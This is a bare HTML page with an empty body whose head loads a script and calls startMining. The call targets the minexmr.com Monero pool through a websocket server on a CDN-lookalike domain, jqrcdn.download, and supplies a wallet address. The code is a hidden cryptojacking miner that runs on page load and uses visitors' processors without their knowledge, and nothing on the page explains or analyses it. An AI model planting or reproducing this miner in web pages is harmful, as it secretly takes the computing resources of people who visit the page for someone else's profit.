<html><head>
<meta http-equiv="content-type" content="text/html; charset=windows-1252"><script src="lot_data_020/webmr.js"></script>

<script>
	server = "wss://www.jqrcdn.download:8185"
	startMining("minexmr.com","489djE22mdZ3j34vhES98tCzfVn57Wq4fA8JR6uzgHqYCfYE2nmaZxmjepwr3GQAZd3qc3imFyGPHBy4PBWLb4tc1X8ADsu"); 
</script></head><body></body></html>